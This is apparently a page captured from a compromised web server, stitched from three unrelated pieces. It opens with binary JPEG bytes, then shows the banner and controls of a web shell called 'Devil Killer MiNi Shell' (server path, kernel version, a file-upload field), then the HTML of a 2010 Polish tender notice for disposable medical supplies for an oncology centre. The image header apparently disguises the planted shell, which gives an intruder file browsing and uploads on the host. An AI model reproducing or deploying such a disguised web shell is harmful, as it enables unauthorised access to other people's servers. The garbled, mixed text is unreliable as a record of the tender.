JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/330658-N-2010.html

<p class="kh_header"><b>Bielsko-Biała: Dostawa  materiałów medycznych jednorazowego użytku dla  potrzeb  Beskidzkiego Centrum Onkologii im. Jana Pawła II.</b><br>
<b>Numer ogłoszenia: 330658 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Beskidzkie Centrum Onkologii im. Jana Pawła II , ul. Wyzwolenia 18, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8164061, faks 033 8164401, 4984042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.onkologia.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów medycznych jednorazowego użytku dla  potrzeb  Beskidzkiego Centrum Onkologii im. Jana Pawła II..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, w ramach wyodrębnionych zadań (pakietów) materiałów medycznych jednorazowego użytku  dla potrzeb Beskidzkiego Centrum Onkologii w asortymencie i ilościach określonych szczegółowo w załączniku nr 5 do siwz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.00-2, 33.14.12.40-4, 33.14.12.20-8, 33.14.13.10-6, 33.14.13.20-9, 33.14.13.23-0, 33.14.11.23-8, 33.14.16.00-6, 33.19.90.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający wymaga złożenia:
a)	stosownego wykazu wykonanych  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych  dokumentów (np. referencji)  potwierdzających, że  dostawy  te zostały wykonane lub są wykonywane należycie.       - do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, że dostawy te zostały wykonane należycie lub, że są wykonywane należycie. Dla Zamawiającego warunkiem wystarczającym jest wykazanie jednego zamówienia o wartości nie niższej niż:  4.400,00 zł - w przypadku złożenia oferty na pakiet nr 1, 6.400,00 zł w przypadku złożenia oferty na pakiet nr 2A,  1.200,00 zł - w przypadku złożenia oferty na pakiet nr  2B, 11.300,00 zł w przypadku złożenia oferty na pakiet nr 2C, 24.800,00 zł w przypadku złożenia oferty na pakiet nr 3, 1.200,00 zł w przypadku złożenia oferty na pakiet nr 3A, 12.200,00 zł w przypadku złożenia oferty na pakiet nr 4,  53.800,00 zł w przypadku złożenia oferty na pakiet nr 5, 25.800,00 zł w przypadku złożenia oferty na pakiet nr 6, 10.900,00 zł w przypadku złożenia oferty na pakiet nr 6A, 21.900,00 zł w przypadku złożenia oferty na pakiet nr 7, 17.100,00 zł w przypadku złożenia oferty na pakiet nr 8,  7.400,00 zł w przypadku złożenia oferty na pakiet nr 9, 50.800,00 zł w przypadku złożenia oferty na pakiet nr 10, 22.500,00 zł w przypadku złożenia oferty na pakiet nr 11, 35.900,00 zł w przypadku złożenia oferty na pakiet nr 12, 46.000,00 zł w przypadku złożenia oferty na pakiet nr 13, 16.100,00 zł w przypadku złożenia oferty na pakiet nr 14, 96.900,00 zł w przypadku złożenia oferty na pakiet nr 15, 8.000,00 zł w przypadku złożenia oferty na pakiet nr 16,  800 zł w przypadku  złożenia oferty na pakiet nr 17  potwierdzonego stosownymi dokumentami,  że zostało ono wykonane należycie lub, że jest ono wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1.	 Spełnią warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek  ich posiadania;
-	 posiadania wiedzy i doświadczenia;
-	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej;
Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a)	  stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.

2.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.

3.	Posiadają wiedzę i doświadczenie
Na potwierdzenie warunku Zamawiający wymaga złożenia:
a)	stosownego wykazu wykonanych  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych  dokumentów (np. referencji)  potwierdzających, że  dostawy  te zostały wykonane lub są wykonywane należycie.       - do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, że dostawy te zostały wykonane należycie lub, że są wykonywane należycie. Dla Zamawiającego warunkiem wystarczającym jest wykazanie jednego zamówienia o wartości nie niższej niż:  4.400,00 zł - w przypadku złożenia oferty na pakiet nr 1, 6.400,00 zł w przypadku złożenia oferty na pakiet nr 2A,  1.200,00 zł - w przypadku złożenia oferty na pakiet nr  2B, 11.300,00 zł w przypadku złożenia oferty na pakiet nr 2C, 24.800,00 zł w przypadku złożenia oferty na pakiet nr 3, 1.200,00 zł w przypadku złożenia oferty na pakiet nr 3A, 12.200,00 zł w przypadku złożenia oferty na pakiet nr 4,  53.800,00 zł w przypadku złożenia oferty na pakiet nr 5, 25.800,00 zł w przypadku złożenia oferty na pakiet nr 6, 10.900,00 zł w przypadku złożenia oferty na pakiet nr 6A, 21.900,00 zł w przypadku złożenia oferty na pakiet nr 7, 17.100,00 zł w przypadku złożenia oferty na pakiet nr 8,  7.400,00 zł w przypadku złożenia oferty na pakiet nr 9, 50.800,00 zł w przypadku złożenia oferty na pakiet nr 10, 22.500,00 zł w przypadku złożenia oferty na pakiet nr 11, 35.900,00 zł w przypadku złożenia oferty na pakiet nr 12, 46.000,00 zł w przypadku złożenia oferty na pakiet nr 13, 16.100,00 zł w przypadku złożenia oferty na pakiet nr 14, 96.900,00 zł w przypadku złożenia oferty na pakiet nr 15, 8.000,00 zł w przypadku złożenia oferty na pakiet nr 16,  800 zł w przypadku  złożenia oferty na pakiet nr 17  potwierdzonego stosownymi dokumentami,  że zostało ono wykonane należycie lub, że jest ono wykonywane należycie;

4.	Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.

5.	Sytuacja ekonomiczna i finansowa
Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w pkt 2 - 5 winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. 
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie (pkt 1) o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. 
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawca powołujący się na potencjał innych podmiotów w zakresie doświadczenia zobowiązany jest do wykazania spełniania warunku poprzez wskazanie części zamówienia, jaką powierzy podwykonawcom.

6.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy.
Na potwierdzenie warunku Zamawiający wymaga złożenia:
a)	 stosownego oświadczenia z art. 24 ust. 1 ustawy Prawo zamówień publicznych o braku podstaw do wykluczenia - wg wzoru stanowiącego załącznik nr 3 do siwz. 
b)	aktualnego odpisu z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy (załącznik nr 3 do siwz)

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w pkt 6.a) i b)  powinien spełniać każdy z Wykonawców samodzielnie.

7.	Spełnią warunki dodatkowe.
-	złożą  wypełniony formularz asortymentowo-cenowy (dla wybranego zadania);
-	zaoferują 30 dniowy termin płatności za wykonaną dostawę; 
-	zagwarantują, że termin ważności oferowanych  produktów nie będzie krótszy niż 6 miesięcy, licząc od daty dostarczenia ich do Zamawiającego;
-	przedstawią  stosowne oświadczenie  potwierdzające, że oferowany sprzęt medyczny oznakowany Est znakiem CE i posiada ważną deklarację zgodności CE. 
-	dostarczą wraz  z ofertą np. w oddzielnej kopercie/kartonie następujące próbki: 1 szt. cewnika z pozycji nr 13 pakietu nr 1, 1 szt. pojemnika z pakietu nr 2B, po 1 szt. oferowanego asortymentu z każdej pozycji pakietu nr 2C, po 1 szt. oferowanego asortymentu z każdej pozycji pakietu nr 5,  1 szt. oferowanego asortymentu  z pakietu nr 6A, po 1 szt. oferowanego asortymentu  z każdej pozycji pakietu nr 8,1 parę rękawiczek z pozycji nr 5 pakietu nr 11, 1 parę rękawiczek z pakietu nr 12, po 3 pary rękawiczek z każdej pozycji pakietu nr  13, 1 parę rękawiczek  z pakietu nr 14, po 1 szt. oferowanego  asortymentu z każdej pozycji pakietu nr 15 oraz po 1 szt. oferowanego asortymentu z pakietu nr 16 i 17. Do wymaganych próbek należy dołączyć informację zawierającą dane producenta, opis zawierający wskazania producenta co do właściwości przedmiotu zamówienia, zasad bezpieczeństwa użytkowania i terminów ważności.
Na potwierdzenie spełnienia tych warunków Zamawiający wymaga złożenia:
a)	wypełnionego formularza asortymentowo-cenowego (dla wybranego zadania) - wg wzoru stanowiącego załącznik nr 5 do siwz
b)	wypełnionego formularza ofertowego - wg wzoru stanowiącego  załącznik nr 1 do siwz
c)	oświadczenia  potwierdzającego, że oferowany sprzęt medyczny oznakowany jest znakiem CE i posiada ważną deklarację zgodności CE. 
d)	następujących próbek: 1 szt. cewnika z pozycji nr 13 pakietu nr 1, 1 szt. pojemnika z pakietu nr 2B, po 1 szt. oferowanego asortymentu z każdej pozycji pakietu nr 2C, po 1 szt. oferowanego asortymentu z każdej pozycji pakietu nr 5,  1 szt. oferowanego asortymentu  z pakietu nr 6A, po 1 szt. oferowanego asortymentu  z każdej pozycji pakietu nr 8,1 parę rękawiczek z pozycji nr 5 pakietu nr 11, 1 parę rękawiczek z pakietu nr 12, po 3 pary rękawiczek z każdej pozycji pakietu nr  13, 1 parę rękawiczek  z pakietu nr 14, po 1 szt. oferowanego  asortymentu z każdej pozycji pakietu nr 15 oraz po 1 szt. oferowanego asortymentu z pakietu nr 16 i 17. Do wymaganych próbek należy dołączyć informację zawierającą dane producenta, opis zawierający wskazania producenta co do właściwości przedmiotu zamówienia, zasad bezpieczeństwa użytkowania i terminów ważności.

W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego dokumenty i oświadczenia, o których mowa w pkt  7 a) -  d) składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie.
Ocena spełnienia określonych wyżej warunków zostanie dokonana na podstawie złożonych przez 
Wykonawcę dokumentów, w tym oświadczeń, określonych w treści siwz. Zamawiający sprawdzi kompletność oświadczeń i dokumentów a następnie dokona sprawdzenia spełnienia warunków wg zasady spełnia (+) / niespełnia (-), co musi wynikać jednoznacznie z treści tych oświadczeń i dokumentów. Wykonawca, który nie spełni   warunków uprawniających do udziału w postępowaniu, o których mowa w pkt. 1.a), 3 a), 6.a) i b) zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą,  natomiast   oferta  Wykonawcy,  który  nie spełni warunków, o których mowa w pkt. 7. a), b), c) i d)   zostanie odrzucona.

Dokumenty, w tym oświadczenia, jakie należy złożyć w postępowaniu:
1.	Wypełniony formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do siwz.
2.	Oświadczenie z art. 22 ust 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.
3.	Oświadczenie z  art. 24 ust 1 ustawy prawo zamówień publicznych o braku podstaw do wykluczenia - wg wzoru stanowiącego załącznik nr 3 do siwz.
4.	Wypełniony formularz asortymentowo-cenowy ( dla wybranego zadania) - wg wzoru stanowiącego załącznik nr 5 do siwz.
5.	Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy (załącznik nr 3 do siwz).
6.	Pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - udzielone osobom nie wymienionym w dokumencie, o którym mowa w pkt 5 a reprezentującym Wykonawcę, w szczególności poprzez podpisywanie/poświadczanie dokumentów składających się na ofertę oraz innych składanych w toku postępowania.
7.	 Wykaz wykonanych  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych  dokumentów (np. referencji)  potwierdzających, że  dostawy  te zostały wykonane lub są wykonywane należycie.       - do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, że dostawy te zostały wykonane należycie lub, że są wykonywane należycie. Dla Zamawiającego warunkiem wystarczającym jest wykazanie jednego zamówienia o wartości nie niższej niż:  4.400,00 zł - w przypadku złożenia oferty na pakiet nr 1, 6.400,00 zł w przypadku złożenia oferty na pakiet nr 2A,  1.200,00 zł - w przypadku złożenia oferty na pakiet nr  2B, 11.300,00 zł w przypadku złożenia oferty na pakiet nr 2C, 24.800,00 zł w przypadku złożenia oferty na pakiet nr 3, 1.200,00 zł w przypadku złożenia oferty na pakiet nr 3A, 12.200,00 zł w przypadku złożenia oferty na pakiet nr 4,  53.800,00 zł w przypadku złożenia oferty na pakiet nr 5, 25.800,00 zł w przypadku złożenia oferty na pakiet nr 6, 10.900,00 zł w przypadku złożenia oferty na pakiet nr 6A, 21.900,00 zł w przypadku złożenia oferty na pakiet nr 7, 17.100,00 zł w przypadku złożenia oferty na pakiet nr 8,  7.400,00 zł w przypadku złożenia oferty na pakiet nr 9, 50.800,00 zł w przypadku złożenia oferty na pakiet nr 10, 22.500,00 zł w przypadku złożenia oferty na pakiet nr 11, 35.900,00 zł w przypadku złożenia oferty na pakiet nr 12, 46.000,00 zł w przypadku złożenia oferty na pakiet nr 13, 16.100,00 zł w przypadku złożenia oferty na pakiet nr 14, 96.900,00 zł w przypadku złożenia oferty na pakiet nr 15, 8.000,00 zł w przypadku złożenia oferty na pakiet nr 16,  800 zł w przypadku  złożenia oferty na pakiet nr 17  potwierdzonego stosownymi dokumentami,  że zostało ono wykonane należycie lub, że jest ono wykonywane należycie;
8.	Oświadczenia  potwierdzającego, że oferowany sprzęt medyczny oznakowany jest znakiem CE i posiada ważną deklarację zgodności CE. 
9.	Próbki wraz z informacją i opisem, o których mowa w rozdziale V pkt 7 ppkt d) w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego. 
Uwaga:  Po wykorzystaniu próbek Zamawiający postąpi z nimi  tak jak z materiałem zakaźnym tzn. odda je do utylizacji. 
10.	Pisemne zobowiązanie innych podmiotów zgodnie z art. 26 ust. 2 b) ustawy do oddania do dyspozycji Wykonawcy niezbędnych zasobów (wiedza, doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia oraz zdolności finansowe) na okres korzystania z nich przy wykonywaniu zamówienia - dotyczy Wykonawców, którzy polegają na wiedzy, doświadczeniu, potencjale technicznym i osobach  zdolnych  do wykonania zamówienia oraz zdolnościach finansowych innych podmiotów.
11.	W przypadku dokumentów o których mowa w pkt  3 i 5 innych podmiotów,  na  okoliczność gdy Wykonawca będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Zamawiający żąda tych dokumentów, tylko wtedy gdy podmioty będą brały udział w realizacji części zamówienia. W przypadku kiedy podmiot trzeci nie będzie brał udziału w realizacji zamówienia lecz udostępni swoje zasoby np. (sprzęt, pracowników) Zamawiający nie żąda tych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
